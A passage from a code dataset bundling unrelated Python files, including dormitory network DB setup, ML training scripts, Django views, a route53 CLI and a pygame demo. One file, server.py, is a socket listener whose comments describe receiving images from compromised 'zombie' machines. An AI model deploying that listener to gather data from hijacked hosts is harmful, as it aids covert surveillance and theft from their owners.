server_net_devices.append(pan_net_device_3)\n pan_net_device_4 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_4)\n pan_net_device_5 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_5)\n pan_net_device_6 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_6)\n pan_net_device_7 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_7)\n pan_net_device_8 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_8)\n pan_host = host.ServerHost(room=server_room_wu9_dach, user=root, name=\"pan\")\n pan_net_device_1.host = pan_host\n pan_net_device_2.host = pan_host\n pan_net_device_3.host = pan_host\n pan_net_device_4.host = pan_host\n pan_net_device_5.host = pan_host\n pan_net_device_6.host = pan_host\n pan_net_device_7.host = pan_host\n pan_net_device_8.host = pan_host\n server_hosts.append(pan_host)\n pan_ip_1 = host.Ip(address=\"141.30.228.1\",net_device=pan_net_device_1, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(pan_ip_1)\n pan_ip_2 = host.Ip(address=\"141.30.224.1\",net_device=pan_net_device_2, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh6.tu-dresden.de\").one())\n ips.append(pan_ip_2)\n pan_ip_3 = host.Ip(address=\"141.30.223.1\",net_device=pan_net_device_3, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh5.tu-dresden.de\").one())\n ips.append(pan_ip_3)\n pan_ip_4 = host.Ip(address=\"141.30.222.1\",net_device=pan_net_device_4, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh4.tu-dresden.de\").one())\n ips.append(pan_ip_4)\n pan_ip_5 = host.Ip(address=\"141.30.227.1\",net_device=pan_net_device_5, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh3.tu-dresden.de\").one())\n ips.append(pan_ip_5)\n pan_ip_6 = host.Ip(address=\"141.30.226.1\",net_device=pan_net_device_6, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh7.tu-dresden.de\").one())\n ips.append(pan_ip_6)\n pan_ip_7 = host.Ip(address=\"141.30.216.1\",net_device=pan_net_device_7, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh16.tu-dresden.de\").one())\n ips.append(pan_ip_7)\n pan_ip_8 = host.Ip(address=\"141.30.202.1\",net_device=pan_net_device_8, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh30.tu-dresden.de\").one())\n ips.append(pan_ip_8)\n pan_a_record_1 = host.ARecord(host=pan_host, name=\"pan.wh2.tu-dresden.de\",\n address=pan_ip_1)\n a_records.append(pan_a_record_1)\n pan_a_record_2 = host.ARecord(host=pan_host, name=\"pan.wh6.tu-dresden.de\",\n address=pan_ip_2)\n a_records.append(pan_a_record_2)\n pan_a_record_3 = host.ARecord(host=pan_host, name=\"pan.wh5.tu-dresden.de\",\n address=pan_ip_3)\n a_records.append(pan_a_record_3)\n pan_a_record_4 = host.ARecord(host=pan_host, name=\"pan.wh4.tu-dresden.de\",\n address=pan_ip_4)\n a_records.append(pan_a_record_4)\n pan_a_record_5 = host.ARecord(host=pan_host, name=\"pan.wh3.tu-dresden.de\",\n address=pan_ip_5)\n a_records.append(pan_a_record_5)\n pan_a_record_6 = host.ARecord(host=pan_host, name=\"pan.wh7.tu-dresden.de\",\n address=pan_ip_6)\n a_records.append(pan_a_record_6)\n pan_a_record_7 = host.ARecord(host=pan_host, name=\"pan.wh16.tu-dresden.de\",\n address=pan_ip_7)\n a_records.append(pan_a_record_7)\n pan_a_record_8 = host.ARecord(host=pan_host, name=\"pan.wh30.tu-dresden.de\",\n address=pan_ip_8)\n a_records.append(pan_a_record_8)\n\n session.session.add_all(ips)\n session.session.add_all(server_net_devices)\n session.session.add_all(a_records)\n session.session.add_all(server_hosts)\n\n\n\n session.session.commit()\n","sub_path":"legacy/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":21204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"291843967","text":"import mxnet as mx\n\n# 可将以下代码\n# conv1 = mx.sym.Convolution(data=data, name='conv1',\n# kernel=(5, 5), num_filter=32)\n# bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False)\n# act1 = mx.sym.Activation(data=bn1, name='act1', act_type='relu')\n# 化简为\n# Conv_BN_Act(src=data, layer=\"1\", kernel=(5, 5), num_filter=64)\ndef Conv_BN_Act(src, layer, kernel, num_filter):\n BatchNorm = mx.sym.BatchNorm\n\n conv = mx.sym.Convolution(data=src, name=\"conv\"+layer, kernel=kernel,\n num_filter=num_filter)\n bn = BatchNorm(data=conv, name=\"bn\"+layer, fix_gamma=False)\n act = mx.sym.Activation(data=bn, name=\"act\"+layer, act_type=\"relu\")\n return act\n\n\n## 层自动串联\ndata = mx.symbol.Variable(\"data\")\nfor i in range(0, 3):\n net = Conv_BN_Act(data if i == 0 else net, str(i), (3, 3), 128)\n# 等价于\ndata = mx.symbol.Variable(\"data\")\nnet = Conv_BN_Act(data, \"0\", (3, 3), 128)\nnet = Conv_BN_Act(net, \"1\", (3, 3), 128)\nnet = Conv_BN_Act(net, \"2\", (3, 3), 128)\n\n\n","sub_path":"MXNET/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"76316434","text":"from django.contrib import admin\nfrom user.models import User\nfrom django.contrib.auth.admin import UserAdmin\n\n\nclass NewUserAdmin(UserAdmin):\n fieldsets = (\n (None, {'fields': ('username', 'password')}),\n ('Personal info', {'fields': ('first_name', 'last_name', 'email', 'team_name', 'team_id')}),\n ('Permissions', {\n 'fields': ('is_active', 'is_staff', 'is_superuser', 'groups', 'user_permissions'),\n }),\n ('Important dates', {'fields': ('last_login', 'date_joined')}),\n )\n list_display = ('username', 'email', 'first_name', 'last_name', 'team_name', 'is_staff')\n\n def get_readonly_fields(self, request, obj=None):\n if request.user.is_superuser:\n readonly_fields = ('team_id',)\n else:\n readonly_fields = ('team_id', 'team_name')\n return readonly_fields\n\n def get_queryset(self, request):\n qs = super().get_queryset(request)\n return qs.filter(team_id=request.user.team_id)\n\n def save_model(self, request, obj, form, change):\n super().save_model(request, obj, form, change)\n if obj.team_id is None:\n obj.team_id = request.user.team_id\n obj.team_name = request.user.team_name\n if obj.team_name != request.user.team_name:\n User.objects.filter(team_id=request.user.team_id).update(team_name=obj.team_name)\n obj.save()\n\n\nadmin.site.register(User, NewUserAdmin)\n\nadmin.site.site_header = 'Teamwork管理系统'\nadmin.site.site_title = 'Teamwork管理系统'\nadmin.site.index_title = 'Teamwork管理系统'\n","sub_path":"user/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"132883680","text":"import csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef readdataset(filename):\n \"\"\"readdataset - reads the sunspot data set from the file with filename.\n Returns tuple of (X, t).\"\"\"\n X_str = []\n t_str = []\n with open(filename, newline='') as datafile:\n data_reader = csv.reader(datafile, delimiter=' ')\n for row in data_reader:\n X_str.append(row[0:5])\n t_str.append(row[5])\n\n X = np.array(X_str, dtype=np.float)\n t = np.array(t_str, dtype=np.float)\n return X, t\n\ndef factorial_scalar(n):\n \"\"\"This auxillary function allows for computing factorials of non-integers\"\"\"\n return np.prod(np.arange(1, np.math.floor(n)+1, dtype=np.uint64))\n\ndef factorial(n_vec):\n \"\"\"This auxillary function allows for computing factorials of vectors non-integers\"\"\"\n f = np.vectorize(factorial_scalar)\n return f(n_vec)\n\ndef log_factorial_scalar(n):\n \"\"\"This auxillary function allows for computing the logarithm of factorials of non-integers\n using Stirling's approximation.\"\"\"\n n_floor = np.math.floor(n)\n if n_floor == 0:\n return 0.0\n else:\n return n_floor * np.log(n_floor) - n_floor + 0.5 * np.log(2 * np.pi * n_floor)\n\ndef log_factorial(n_vec):\n \"\"\"This auxillary function allows for computing logarithm of factorials of vectors of non-integers\"\"\"\n f = np.vectorize(log_factorial_scalar)\n return f(n_vec)\n\n\n# Read the training set\nX_train, t_train = readdataset('../data/sunspotsTrainStatML.dt')\n\nN_train, D = X_train.shape\nprint(\"Training set has X dimension D = \" + str(D) + \" and N = \" + str(N_train) + ' samples.')\n\n\n# Read the test set\nX_test, t_test = readdataset('../data/sunspotsTestStatML.dt')\n\nN_test, D_test = X_test.shape\nprint(\"Test set has X dimension D = \" + str(D_test) + \" and N = \" + str(N_test) + ' samples.')\n\n\n# Visualize the data set\nplt.figure()\nplt.plot(X_train[:,4], t_train, 'o')\nplt.title(\"Train\")\nplt.xlabel('X[4]')\nplt.ylabel('t')\n\nplt.figure()\nplt.plot(X_test[:,4], t_test, 'o')\nplt.title(\"Test\")\nplt.xlabel('X[4]')\nplt.ylabel('t')\n\nplt.figure()\nplt.hist(t_train)\nplt.title('Train')\nplt.xlabel('t values')\nplt.ylabel('hist(t)')\n\nplt.figure()\nplt.hist(t_test)\nplt.title('Test')\nplt.xlabel('t values')\nplt.ylabel('hist(t)')\n\n\n#####################################################\n# Add your solution here\n# It is alright to create additional Python scripts,\n# if you find this appropriate.\n#####################################################\n\n\n# This function has been taken from my answer to assignment 1.\n# The assignment was fully made by me and not made in any collaborations.\ndef RMSE(t, tp):\n N = len(t)\n s = 0\n for i in range(N):\n s += np.linalg.norm((t[i] - tp[i]))**2\n s /= N\n s = s**(0.5)\n return s\n\n# The metropolis hasting algorithm\nclass Metropolis_Hasting:\n def __init__(self, X, t, n_accepted_samples, n_burn_in, n_thinning):\n self.X = self.prepare_data(X, axis = 1)\n self.t = t\n self.mu = np.ones(self.X.shape[1])\n self.accepted = []\n self.n_accepted_samples = n_accepted_samples\n self.n_burn_in = n_burn_in\n self.fit(n_thinning)\n self.accepted = np.array(self.accepted)\n\n def prepare_data(self, data, axis = 1):\n new_data = np.insert(data, 0, 1, axis = axis)\n return new_data\n\n def f(self, x, w):\n return np.matmul(w.T, x)\n\n def prior(self):\n rerun = False\n sample = np.random.multivariate_normal(self.mu.T, 0.25 * np.identity(len(self.mu)))\n\n for x in self.X:\n if (not (self.f(x, sample) > 0)):\n rerun = True\n \n if (not rerun):\n return sample\n else:\n return self.prior()\n\n def proposal(self, mu):\n rerun = False\n sample = np.random.multivariate_normal(mu.T, 0.1 * np.identity(len(self.mu)))\n\n for x in self.X:\n if (not (self.f(x, sample) > 0)):\n rerun = True\n \n if (not rerun):\n return sample\n else:\n return self.proposal(mu)\n\n def log_posterior(self, w):\n s = 0\n for i in range(len(self.t)):\n s += self.t[i] * np.log(self.f(self.X[i], w)) - self.f(self.X[i], w) - log_factorial_scalar(self.t[i])\n\n s -= 1/(2 * 0.25) * np.matmul(np.subtract(w, self.mu).T, np.subtract(w, self.mu))\n s -= np.log(np.power(np.sqrt(2 * np.pi * 0.25), len(self.mu)))\n\n return s\n\n def acceptance(self, w_new, w_old):\n left_side = 0\n right_side = self.log_posterior(w_new) - self.log_posterior(w_old)\n\n return min(left_side, right_side)\n \n def fit(self, thinning = 5):\n steps = 0\n w_old = self.prior()\n while(len(self.accepted) < self.n_accepted_samples):\n w_new = self.proposal(w_old)\n r = self.acceptance(w_new, w_old)\n u = np.random.uniform(0, 1)\n steps += 1\n if (steps < self.n_burn_in):\n continue\n else:\n if (r >= np.log(u)):\n if (steps % thinning == 0):\n w_old = w_new\n self.accepted.append(w_old)\n else:\n if (steps % thinning == 0):\n self.accepted.append(w_old)\n \n def predict(self, X):\n t = []\n for x in X:\n s = 0\n for w in self.accepted:\n s += self.f(self.prepare_data(x, axis = 0), w)\n \n s /= len(self.accepted)\n t.append(s)\n \n return t\n\n# Constants used in the models\nnumber_of_samples = 3000\nburn_in = 30\nthinning = 5\n\n# The three models\nmodel_1 = Metropolis_Hasting(X_train[:, 4].reshape((-1, 1)), t_train, number_of_samples, burn_in, thinning)\nmodel_1_predictions = model_1.predict(X_test[:, 4].reshape((-1, 1)))\nRMSE_1 = RMSE(t_test, model_1_predictions)\nprint(\"RMSE 1: {}\".format(RMSE_1))\n\nmodel_2 = Metropolis_Hasting(X_train[:, 2:4], t_train, number_of_samples, burn_in, thinning)\nmodel_2_predictions = model_2.predict(X_test[:, 2:4])\nRMSE_2 = RMSE(t_test, model_2_predictions)\nprint(\"RMSE 2: {}\".format(RMSE_2))\n\nmodel_3 = Metropolis_Hasting(X_train, t_train, number_of_samples, burn_in, thinning)\nmodel_3_predictions = model_3.predict(X_test)\nRMSE_3 = RMSE(t_test, model_3_predictions)\nprint(\"RMSE 3: {}\".format(RMSE_3))\n\nplt.figure()\nplt.plot(model_1.accepted[:, 0], model_1.accepted[:, 1], 'bo')\n\nplt.figure()\nplt.scatter(t_test, model_1_predictions, c = \"blue\")\nplt.xlabel(\"True values\")\nplt.ylabel(\"Predictions\")\n\n# Show all figures\nplt.show()","sub_path":"code/sunspot.py","file_name":"sunspot.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"479245614","text":"from django.shortcuts import render\nfrom .models import Product\nfrom django.core.paginator import Paginator\nfrom .models import Contact\nfrom math import ceil\n\n# Create your views here.\n\ndef index(request):\n product_objects = Product.objects.all()\n\n ''' \n creating search funtionality always work into forms\n '''\n\n search1 = request.GET.get(\"search1\")\n if search1 != \"\" and search1 is not None:\n product_objects = product_objects.filter(title__icontains=search1)\n\n\n #pagination code for number od slides\n\n paginator = Paginator(product_objects,4)\n page = request.GET.get('page')\n product_objects = paginator.get_page(page)\n\n return render(request,'shop/index.html',{\"product_objects\":product_objects})\n \n\n\n\ndef productview(request,id):\n\n product_object = Product.objects.get(id=id)\n \n return render(request,'shop/productview.html',{\"product_object\":product_object})\n\n\n# // to get the items in checkout form\ndef checkout(request):\n\n if request.method==\"POST\":\n \n items =request.POST['items']\n name =request.POST['name']\n email=request.POST['email']\n phone=request.POST['phone']\n address=request.POST['address']\n total=request.POST['total']\n\n ins=Contact( items=items, name=name , email=email, phone=phone, address=address,total=total)\n ins.save()\n\n return render(request,'shop/checkout.html')\n\n\n\n\n\n ","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"653842763","text":"import __builtin__\nfrom os.path import exists\nimport appscript\nfrom envoy import run\nimport app\n\nclass cls(app.reference.cls):\n calendar = None\n # status\n # allday_event\n # description\n # end_date\n # sequence\n # url\n # summary\n # recurrence\n # location\n # excluded_dates\n # start_date\n # start_date\n # stamp_date\n\n def __init__(self,calendar,reference):\n self.calendar=calendar\n self.reference=reference\n\n def set_dates(self,start,end):\n self.start_date=start\n self.end_date=end\n \n def __str__(self):\n return self.summary\n\nclass list(app.list.cls):\n calendar = None\n def __init__(self, calendar=None,data=[]):\n from calendar import cls\n if calendar:\n if not isinstance(calendar,cls):\n raise TypeError(\"\"\"\"\ninvalid calendar type %s. expected calendar.cls\"\"\" % calendar.__class__)\n if not issubclass(data.__class__,__builtin__.list):\n raise TypeError(\"\"\"\"\ninvalid data type %s. expected [event.cls]\"\"\" % data.__class__)\n self.calendar=calendar\n super(type(self),self).__init__(data,[\"uid\",\"summary\"])\n\n def new(self):\n if self.calendar:\n r=appscript.app('iCal').calendars[appscript.its.uid==self.calendar.uid].\\\n first.events.end.make(new=appscript.k.event)\n return cls(self.calendar,r)\n else:\n raise ValueError(\"calendar undefined\")\n\n @property\n def today(self):\n \"\"\"return list of today events\"\"\"\n if exists(\"/usr/local/bin/icalBuddy\"):\n output = run(\"/usr/local/bin/icalBuddy -nc -eed -uid eventsToday | sed -n '/uid:/p' | tr -d '[:blank:]uid:'\").std_out\n uids=[]\n for l in output.splitlines():\n if len(l) == 36: # uid, not error\n uids.append(l)\n return type(self)(\n self.calendar,\n filter(lambda e:e.uid in uids,self[:])\n ) \n else:\n raise IOError(\"/usr/local/bin/icalBuddy not eixsts\")","sub_path":"ical/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"482708182","text":"import pygame\r\nimport random \r\npygame.init()\r\n\r\npygame.display.set_caption('Move the ball!')\r\n\r\nscreen = pygame.display.set_mode((640, 400))\r\nscreenrect = screen.get_rect()\r\nbackground = pygame.Surface(screen.get_size()).convert() \r\nbackground.fill((255, 255, 255)) #fill background white\r\nscreen.blit(background, (0, 0))\r\n\r\n\r\nball_surface = pygame.Surface((50,50)) \r\nball_surface.set_colorkey((0,0,0)) \r\npygame.draw.circle(ball_surface, (255,0,0), (25,25),25) \r\nball_surface = ball_surface.convert_alpha() # for faster blitting. because transparency, use convert_alpha()\r\nballrect = ball_surface.get_rect()\r\n\r\nclock = pygame.time.Clock()\r\n\r\nFPS = 60\r\nplaytime = 0\r\nx=25 \r\ny=25\r\nspeedx = 20\r\nspeedy = 20\r\nscreen.blit(ball_surface, (x, y)) #blit the ball surface on the screen (on top of background)\r\n\r\nrunning = True\r\n\r\nleft = False\r\nright = False\r\ndown = False\r\nup = False\r\n\r\nwhile running:\r\n milliseconds = clock.tick(FPS) # milliseconds passed since last frame\r\n seconds = milliseconds / 1000.0\r\n playtime += seconds\r\n screen.blit(background, (0, 0))\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n running = False\r\n\r\n keys = pygame.key.get_pressed()\r\n\r\n if keys[pygame.K_LEFT] and x>0:\r\n x -= speedx\r\n left = True\r\n right = False\r\n elif keys[pygame.K_RIGHT] and x + ballrect.width < screenrect.width:\r\n x += speedx\r\n left = False\r\n right = True\r\n elif keys[pygame.K_DOWN] and y + ballrect.height < screenrect.height:\r\n y += speedy\r\n up = False\r\n down = True \r\n elif keys[pygame.K_UP] and y>0:\r\n y -= speedy\r\n up = True\r\n down = False \r\n\r\n # paint the ball \r\n screen.blit(ball_surface, (x,y))\r\n\r\n pygame.display.update()\r\n\r\npygame.quit()","sub_path":"lab8.py","file_name":"lab8.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"295752743","text":"import os\nimport sys\n\nimport pytest\n\n# print(os.path.dirname(__file__))\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"../../\")))\n# print(sys.path)\n\nfrom snakeeyes.app import create_app\n\n\n@pytest.fixture(scope=\"session\")\ndef app():\n \"\"\"\n Setup our flask test app, this only gets executed once.\n\n :return: Flask app\n \"\"\"\n params = {\n \"DEBUG\": False,\n \"TESTING\": True,\n }\n\n _app = create_app(settings_override=params)\n\n # Establish an application context before running the tests\n ctx = _app.app_context()\n ctx.push()\n\n yield _app\n\n ctx.pop()\n\n\n@pytest.fixture(scope=\"function\")\ndef client(app):\n \"\"\"\n Setup an app client, this gets executed for each test function.\n\n :param app: Pytest fixture\n :return: Flask app client\n \"\"\"\n print(type(app))\n yield app.test_client()\n","sub_path":"src/snakeeyes/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"146421019","text":"from __future__ import absolute_import\nimport six\nfrom django.http import Http404\n\nfrom xmodule.modulestore.django import modulestore\n\n\ndef get_course(course_id, depth=0):\n \"\"\"\n Given a course id, return the corresponding course descriptor.\n\n If the course does not exist, raises a ValueError. This is appropriate\n for internal use.\n\n depth: The number of levels of children for the modulestore to cache.\n None means infinite depth. Default is to fetch no children.\n \"\"\"\n course = modulestore().get_course(course_id, depth=depth)\n if course is None:\n raise ValueError(u\"Course not found: {0}\".format(course_id))\n return course\n\n\ndef get_course_by_id(course_key, depth=0):\n \"\"\"\n Given a course id, return the corresponding course descriptor.\n\n If such a course does not exist, raises a 404.\n\n depth: The number of levels of children for the modulestore to cache. None means infinite depth\n \"\"\"\n with modulestore().bulk_operations(course_key):\n course = modulestore().get_course(course_key, depth=depth)\n\n if course:\n return course\n else:\n raise Http404(u\"Course not found: {}.\".format(six.text_type(course_key)))\n","sub_path":"mocks/juniper/lms/djangoapps/courseware/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"134006207","text":"import sys\nfrom check import common\nfrom check import check_domain, list_records, change_records, delete_records\n\ndef verify(argv):\n print(len(argv))\n help = '''route53 is a tool for management of DNS Records\\n\\n\n Basic Commands: \n Please add -h or --help for Assistance\n Options:\n create record/record-set x.x.x.x. 3.3.3.3 => Creates A Record[example create record/record-set example.domain.com. 7.7.7.7 ]\n create hosted/hosted-zone x.x. => Creates Hosted Zone [Example create hosted/hosted-zone example.com. ]\n list hosted/hosted-zone[s] all => Lists all Hosted Zones [Example list hosted/hosted-zone all]\n list record/record-set[s] all => Lists all Record Sets in Hosted Zones [Example list record/record-set all]\n list hosted/hosted-zone x.x.x.x. => Lists Hosted Zone x.x.x.x if present [Example list hosted/hosted-zone example.com. ]\n list record/record-set x.x.x.x. => Lists Record Set x.x.x.x in Hosted Zones if present [Example list record/record-set team.example.com]\n change => Change Record Set\n delete => Delete Record Set\n '''\n\n def create():\n comment= \"Created hosted zone \" + argv[2] \n count=argv[2].count(\".\")\n if argv[1].strip()==\"hosted-zone\" or argv[1].strip()==\"h\" or argv[1].strip()==\"hosted\" and count>=2 and len(argv)==3:\n if argv[2].strip()[-1]!=\".\":\n argv[2] += \".\"\n conn=common()\n try:\n new_zone, change_info = conn.create_hosted_zone(\n argv[2], comment=comment\n )\n print(\"Zone ID \", new_zone.id)\n\n except:\n print(\"Cannot create hosted zone\")\n sys.exit(1)\n\n elif argv[1].strip()==\"record\" or argv[1].strip()==\"record-set\" and count>=2 and len(argv)==4:\n if len(argv[3].split(\".\"))==4:\n if argv[2][-1] != \".\":\n argv[2] += \".\"\n check_domain(argv[2],argv[3])\n\n else:\n print(\"Enter IP Address as X.X.X.X\") \n sys.exit(1)\n else:\n print(\"Invalid Credentials Entered\\n\")\n print(help.split(\":\")[2] )\n sys.exit(1)\n \n def list():\n try:\n list_records(argv[1],argv[2])\n except:\n print(\"Error in number of variables entered\")\n sys.exit(1)\n\n def change():\n try:\n if (argv[2][-1] != \".\"):\n argv[2] += \".\"\n if argv[3][-1] != \".\" and (argv[1]==\"record\" or argv[1]==\"r\"):\n argv[3] += \".\"\n change_records(argv[1],argv[2],argv[3])\n except:\n print(\"invalid credentials\")\n sys.exit(1)\n\n def delete():\n try:\n if (argv[1][-1] != \".\"):\n argv[1] += \".\"\n delete_records(argv[1])\n except:\n print(\"Enter Valid Input\")\n\n if len(argv)<1:\n print (help)\n sys.exit(0)\n\n if len(argv)==1:\n if str(argv[0].strip())==\"-h\" or str(argv[0].strip())==\"--help\":\n print(help.split(\":\")[2] )\n sys.exit(0)\n \n else:\n print(help.split(\":\")[2] ) \n\n elif argv[0].strip()==\"create\" or argv[0].strip()==\"cr\":\n create()\n \n elif argv[0].strip()==\"list\" or argv[0].strip()==\"ls\":\n list()\n\n elif argv[0].strip()==\"change\" or argv[0].strip()==\"ch\":\n change()\n \n elif str(argv[0].strip())==\"delete\" or str(argv[0].strip())==\"dl\":\n delete()\n\n else:\n print(help.split(\":\")[2] )\n sys.exit(1)\n","sub_path":"src/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"329194389","text":"import socket,sys,threading,struct,os\n\ndef service():\n\t#抛出错误\n try:\n \t#创建套接字\n server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #配置端口释放规则,1代表立即释放,默认2min\n server.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n serveraddr = (\"\",14444)\n server.bind(serveraddr)\n server.listen(10)\n except socket.error as e:\n print(\"*建立Socket失败,由于:\",e,sep=\"\")\n sys.exit(1)\n\n print(\"Wainting for Connection...\")\n\n #循环,业务等待\n while True:\n #确认链接\n clientsocket,clientaddr = server.accept()\n #多线程\n t = threading.Thread(target=receiveDataFromClient,args=(clientsocket,clientaddr,))\n t.start()\n\n#多线程接收数据\ndef receiveDataFromClient(clientsocket,clientaddr):\n\t#成功连接肉鸡的提示\n print(\"肉鸡来了{}\".format(clientaddr))\n while True:\n \t#设定单次接收图片的数据流大小为128bytes\n fileinfosize = struct.calcsize(\"128sl\")\n fileinfopck = clientsocket.recv(fileinfosize)\n #如果数据流非空\n if fileinfopck:\n \t#解包\n filename,filesize = struct.unpack(\"128sl\",fileinfopck)\n filename = filename.strip(str.encode(\"\\00\"))\n\n #接收图片\n newfilename = os.path.join(str.encode(\"./\"),str.encode(\"new_\")+filename)\n print(\"接收文件{},另存为{}\".format(filename,newfilename))\n\n #统计接收量\n recv_file_size = 0\n #创建缓存文件\n tempfile = open(newfilename,\"wb\")\n #判断分段数据,写入缓存文件\n while not recv_file_size == filesize:\n if filesize - recv_file_size > 1024:\n recvdata = clientsocket.recv(1024)\n recv_file_size += len(recvdata)\n else:\n recvdata = clientsocket.recv(filesize - recv_file_size)\n recv_file_size = filesize\n tempfile.write(recvdata)\n\n tempfile.close()\n print(\"文件接收完成,保存在{}\".format(newfilename))\n \nif __name__ == \"__main__\":\n service()\n \n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"165788457","text":"from keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.callbacks import ReduceLROnPlateau\r\nfrom keras.optimizers import SGD\r\nfrom matplotlib import pyplot as plt\r\nfrom keras.callbacks import EarlyStopping\r\nfrom keras.applications.vgg19 import VGG19\r\n\r\n\r\nimg_rows, img_cols = 224,224\r\n\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n horizontal_flip=True)\r\ntrain_generator = train_datagen.flow_from_directory(\r\n \"C:/Users/pma009/Documents/python/MeliponasImageDatastore227x227_8especies/train\",\r\n target_size=(img_rows,img_cols),\r\n batch_size=32)\r\n\r\nvalidation_datagen = ImageDataGenerator(rescale=1./255)\r\nvalidation_generator = validation_datagen.flow_from_directory(\r\n \"C:/Users/pma009/Documents/python/MeliponasImageDatastore227x227_8especies/test\",\r\n target_size=(img_rows,img_cols),\r\n batch_size=32)\r\n\r\n\r\nmodel = VGG19(include_top=True, weights=None, classes=8)#(include_top=False, weights='imagenet', classes=8)\r\n\r\nearly_stopping = EarlyStopping(monitor='val_loss', patience=5)\r\n\r\noptim = SGD(lr=0.001,momentum=0.6)\r\n# optim = RMSprop(lr=0.001)\r\nmodel.compile(loss='categorical_crossentropy', optimizer=optim, metrics=['accuracy'])\r\nmodel.summary()\r\nhistory = model.fit_generator(train_generator, steps_per_epoch=50, epochs=60, validation_data=validation_generator,validation_steps=50)#,\r\n # callbacks=[early_stopping])#,\r\n # callbacks=callbacks_list)\r\nacc = history.history[\"val_acc\"]\r\npos = len(acc)-1\r\nmodel.save(f'VGG19_MeliponasImageDatastore227x227_ValAcc_{acc[-1]}.h5')\r\nmodel.save_weights(f'VGG19_MeliponasImageDatastore227x227_weights_ValAcc_{acc[-1]}.hdf5')\r\n\r\n\r\n\r\nprint(history.history.keys())\r\n\r\nplt.figure(1)\r\n\r\n# summarize history for accuracy\r\n\r\nplt.subplot(211)\r\nplt.plot(history.history['acc'])\r\nplt.plot(history.history['val_acc'])\r\nplt.title('model accuracy')\r\nplt.ylabel('accuracy')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'validation'], loc='upper left')\r\n\r\n# summarize history for loss\r\n\r\nplt.subplot(212)\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'validation'], loc='upper left')\r\nplt.show()\r\n\r\n","sub_path":"kerasVGG19.py","file_name":"kerasVGG19.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"552887066","text":"import os\nfrom puffer.api import API\nfrom puffer.managers.profiles import Profiles\n\nclient_id = os.environ['BUFFER_ID']\nclient_secret = os.environ['BUFFER_SECRET']\naccess_token = os.environ['BUFFER_TOKEN']\n\napi = API(client_id=client_id,\n client_secret=client_secret,\n access_token=access_token)\n\nprofile = Profiles(api=api).filter(service='twitter')[0]\n\ntweet = profile.updates.new\n","sub_path":"buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
